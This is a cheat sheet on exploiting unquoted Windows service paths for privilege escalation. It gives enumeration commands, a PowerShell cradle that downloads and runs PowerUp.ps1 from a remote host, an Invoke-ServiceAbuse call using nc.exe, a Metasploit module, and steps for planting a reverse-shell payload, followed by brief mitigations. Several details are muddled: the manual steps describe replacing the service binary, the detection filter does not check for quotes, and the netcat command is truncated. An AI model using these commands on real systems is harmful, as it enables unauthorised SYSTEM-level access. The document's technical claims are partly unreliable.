EoP - Unquoted Service Paths

Unquoted Service Path Vulnerabilities: Identification and Exploitation

Key Concepts

• Service Path: The location of the executable file that a service runs.

• Unquoted Path: A service path containing spaces but lacking quotation marks (e.g., C:\Program Files\My Service\service.exe instead of "C:\Program Files\My Service\service.exe").

• Privilege Escalation: Gaining elevated access to protected resources.

---

Identifying Unquoted Service Paths

1. Using WMIC

The Windows Management Instrumentation Command-line (WMIC) can enumerate services with unquoted paths:

cmdCopy codewmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\"

2. Using PowerShell

A PowerShell script provides a more automated method to identify unquoted paths:

powershellCopy codeGet-WmiObject -Class Win32_Service | 
    Where-Object { $_.StartName -eq "LocalSystem" } | 
    Select-Object Name, DisplayName, PathName, StartMode | 
    Where-Object { $_.PathName -match " " }

3. Using PowerUp

PowerUp, a PowerShell script, identifies privilege escalation vectors, including unquoted paths:

powershellCopy codepowershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://xyz/PowerUp.ps1'); Invoke-AllChecks"

Example Output:

plaintextCopy code[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path        : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName   : LocalSystem
AbuseFunction: Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>

---

Exploiting Unquoted Service Paths

Manual Exploitation Steps

1. Identify the Vulnerable Service: Use the methods above to detect vulnerable services.

2. Create a Malicious Executable: Generate a payload (e.g., a reverse shell) and place it in the same directory as the legitimate executable.

3. Stop the Service:

   cmdCopy codesc stop [SERVICE_NAME]

4. Replace the Executable: Replace the legitimate executable with the malicious payload.

5. Restart the Service:

   cmdCopy codesc start [SERVICE_NAME]

6. Gain Access: When the service restarts, it will execute the malicious payload with elevated privileges.

---

Example of Automatic Exploitation with PowerUp

Use PowerUp’s Invoke-ServiceAbuse to automate exploitation:

powershellCopy codeInvoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 1"

Replace [SERVICE_NAME] with the vulnerable service name and specify the payload command.

---

Example of Exploitation Behavior

For a service with the path:

plaintextCopy codeC:\Program Files\Something\legit.exe

Windows will attempt to execute:

1. C:\Program.exe

2. C:\Program Files.exe

3. C:\Program Files\Something\legit.exe

If a malicious Program.exe or Program Files.exe is placed in these locations, it will execute with elevated privileges.

---

Exploiting with Metasploit

Metasploit provides an exploit module for unquoted service paths:

bashCopy codeuse exploit/windows/local/trusted_service_path

This automates the process of finding and exploiting unquoted paths.

---

Mitigation Strategies

1. Quote Service Paths

Always enclose service paths in quotes, particularly if they contain spaces:

plaintextCopy code"C:\Program Files\My Service\service.exe"

2. Regular Audits

Periodically audit service configurations to detect and remediate unquoted paths.

3. Use Least Privilege

Run services with the least privilege required, avoiding LocalSystem unless absolutely necessary.

4. Implement Security Policies

Adopt strict policies to manage service configurations.

5. Monitoring and Alerts

Set up monitoring to detect unauthorized changes to service paths or configurations.

---

Additional Resources

• Microsoft Documentation on Windows Services

• OWASP Top 10 Security Risks